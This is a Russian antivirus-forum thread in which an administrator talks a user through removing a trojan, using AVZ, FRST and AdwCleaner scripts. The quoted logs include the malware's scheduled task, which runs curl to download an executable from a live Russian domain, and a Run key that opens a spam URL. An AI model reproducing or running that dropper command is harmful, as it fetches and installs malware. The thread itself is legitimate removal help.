Решена Вирус MSI

Статус
В этой теме нельзя размещать новые ответы.

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
UC Browser - сами устанавливали? Если нет, то удалите. Файл host сами правили?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 SetServiceStart('SvcHost Service Host', 4);
 SetServiceStart('Ea3Host', 4);
 QuarantineFile('C:\WINDOWS\microsoft\svchost.exe','');
 QuarantineFile('C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe','');
 QuarantineFile('C:\Windows\Microsoft\svchost.exe','');
 QuarantineFile('C:\WINDOWS\system32\Ea3Host.exe','');
 QuarantineFile('C:\Windows\Microsoft\svchost.exe.exe','');
 QuarantineFile('c:\windows\microsoft\svchost.exe','');
 QuarantineFile('C:\Windows\System32\Ea3Host.exe','');
 QuarantineFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\Windows\System32\Ea3Host.exe','32');
 DeleteFile('c:\windows\microsoft\svchost.exe','32');
 DeleteFile('C:\Windows\Microsoft\svchost.exe.exe','32');
 DeleteFile('C:\WINDOWS\system32\Ea3Host.exe','32');
 DeleteFile('C:\Windows\Microsoft\svchost.exe','32');
 DeleteFile('C:\WINDOWS\system32\Tasks\curl','64');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\Users\Allure\AppData\Roaming\curl\curl.exe','32');
 DeleteFile('C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe','32');
 DeleteFile('C:\WINDOWS\system32\Tasks\MSI','64');
 DeleteFile('C:\Users\Allure\appdata\roaming\curl\curl_7_54.exe','32');
 DeleteFile('C:\WINDOWS\microsoft\svchost.exe.exe','32');
 DeleteFile('C:\WINDOWS\microsoft\svchost.exe','32');
 DeleteService('SvcHost Service Host');
 DeleteService('Ea3Host');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','njvwfmoxsd');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Полученный архив отправьте при помощи этой формы

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4 - HKCU\..\Run: [njvwfmoxsd] C:\WINDOWS\explorer.exe "http://pazdykha.ru/?utm_source=uoua03&utm_content=f53c99a1a9f221180d1cc800a867ecdb&utm_term=D3997B5B325AAF53E6214492C1CDA4E2&utm_d=20170816"
O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (Ready): curl - C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Allure\AppData\Roaming\curl\curl.exe
O22 - Task (Ready): curls - C:\Users\Allure\AppData\Roaming\curl\curl.exe (file missing)
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Tykoro

Новый пользователь
Сообщения
11
Реакции
0
Баллы
11
Да, uc браузер я сам устанавливал, и яндекс браузе тоже.
hosts для програмки auslogic или как то так, и всё
А какой скрипт, можно узнать?
А, всё, понял
Вот
Вроде всё сделал, отправил. Теперь жду :)
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    () C:\Windows\System32\Ea3Host.exe
    () C:\Windows\Microsoft\svchost.exe
    () C:\Windows\Microsoft\svchost.exe.exe
    C:\Windows\Microsoft\svchost.exe.exe
    C:\Windows\Microsoft\svchost.exe
    C:\Users\Allure\AppData\Roaming\curl\curl.exe
    C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe
    HKU\S-1-5-21-3348904501-4052270771-1728816051-1001\...\Run: [njvwfmoxsd] => explorer "hxxp://pazdykha.ru/?utm_source=uoua03&utm_content=f53c99a1a9f221180d1cc800a867ecdb&utm_term=D3997B5B325AAF53E6214492C1CDA4E2&utm_d=20170816" <==== ATTENTION
    R2 Ea3Host; C:\WINDOWS\system32\Ea3Host.exe [969024 2017-08-16] ()
    R2 SvcHost Service Host; C:\Windows\Microsoft\svchost.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
    2017-08-16 15:42 - 2017-08-12 05:23 - 000038080 _____ C:\WINDOWS\SysWOW64\sh4native.exe
    2017-08-16 07:49 - 2017-08-23 04:58 - 000000000 ____D C:\Users\Allure\AppData\Roaming\curl
    2017-08-16 07:49 - 2017-08-16 07:49 - 000003792 _____ C:\WINDOWS\System32\Tasks\curl
    2017-08-16 07:49 - 2017-08-16 07:49 - 000003592 _____ C:\WINDOWS\System32\Tasks\curls
    2017-08-16 07:48 - 2017-08-16 07:48 - 000969024 _____ C:\WINDOWS\system32\Ea3Host.exe
    ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
    Task: {5F6240F6-7BE2-46F9-BBC5-CAFB6D5CDC7E} - System32\Tasks\curls => C:\Users\Allure\AppData\Roaming\curl\curl.exe <==== ATTENTION
    Task: {7577B0A9-1614-475C-A6E8-F964EF89D468} - System32\Tasks\curl => C:\Users\Allure\AppData\Roaming\curl\curl_7_54.exe [2017-08-16] (curl, hxxps://curl.haxx.se/) <==== ATTENTION
    Task: {A8986176-62E2-4701-9406-884B4AF2CD1E} - System32\Tasks\MSI => C:\Users\Allure\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
     -  - 000000000 __RSH () C:\Windows\Microsoft\svchost.exe
     -  - 000000000 _____ () C:\Windows\Microsoft\svchost.exe.exe
    2017-08-16 07:48 - 2017-08-16 07:48 - 000969024 _____ () C:\WINDOWS\system32\Ea3Host.exe
    2017-08-16 07:50 - 2017-08-16 07:50 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\bdzupW0mcoSX.exe
    2017-08-16 07:05 - 2017-08-16 07:05 - 000192000 _____ () C:\Users\Allure\AppData\Local\Temp\bXEOVI5DSQ3u.exe
    2017-08-16 07:42 - 2017-08-16 07:42 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\ksJTlGJjWKpS.exe
    2017-08-16 07:05 - 2017-08-16 07:05 - 000191999 _____ () C:\Users\Allure\AppData\Local\Temp\oPIXmk1O228d.exe
    2017-08-16 07:03 - 2017-08-16 07:03 - 003514360 _____ () C:\Users\Allure\AppData\Local\Temp\pHzIimDfsy1s.exe
    2017-08-16 07:00 - 2017-08-16 07:00 - 000774008 _____ (                                                            ) C:\Users\Allure\AppData\Local\Temp\ZaxarSetup.4.001.1991.exe
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Давайте новый комплект логов FRST для контроля
 

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Это старый лог. Запустите FRST еще раз и нажмите Scan.
И остальные два лога нужны
 

Tykoro

Новый пользователь
Сообщения
11
Реакции
0
Баллы
11
А какие еще остальные два лога?
Это вот отправил, что то еще нужно?
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Addition.txt и FRST.txt - эти нужны. Shortcut не нужен
 

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Addition.txt - еще нужен
 

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Какие из проблем еще остались?
 

Tykoro

Новый пользователь
Сообщения
11
Реакции
0
Баллы
11
В автозагрузке Yc пытался удалить, раньше название Chromium было, с значком синего браузера Google Chrome, щас иконки тоже нету
 

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
Походу это тоже зловред, сейчас дочистим.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Users\Allure\AppData\Local\yc\Application\yc.exe
    HKU\S-1-5-21-3348904501-4052270771-1728816051-1001\...\Run: [ycAutoLaunch_95A4966DF758B4F52078AF3870D252D8] => "C:\Users\Allure\AppData\Local\yc\Application\yc.exe" /prefetch:5
    C:\Users\Allure\AppData\Local\yc\Application\yc.exe
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.



  • Скачайте AdwCleaner и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[S1].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

Tykoro

Новый пользователь
Сообщения
11
Реакции
0
Баллы
11
Вот, Fixlog. Щас будут логи от adw cleaner'a
Вот AdwCleaner[S1]
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,464
Реакции
13,373
Баллы
2,203
  • Запустите повторно AdwCleaner (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать").
  • По окончанию сканирования снимите галочки со следующих строк:
    Код:
    PUP.Optional.SpyHunter, [Key] - HKLM\SOFTWARE\EnigmaSoftwareGroup
  • Нажмите кнопку "Clean" ("Очистка") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

Подробнее читайте в этом руководстве.
А теперь о остаточных симтомах, что-то осталось или переходим к финальным рекомендациям?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу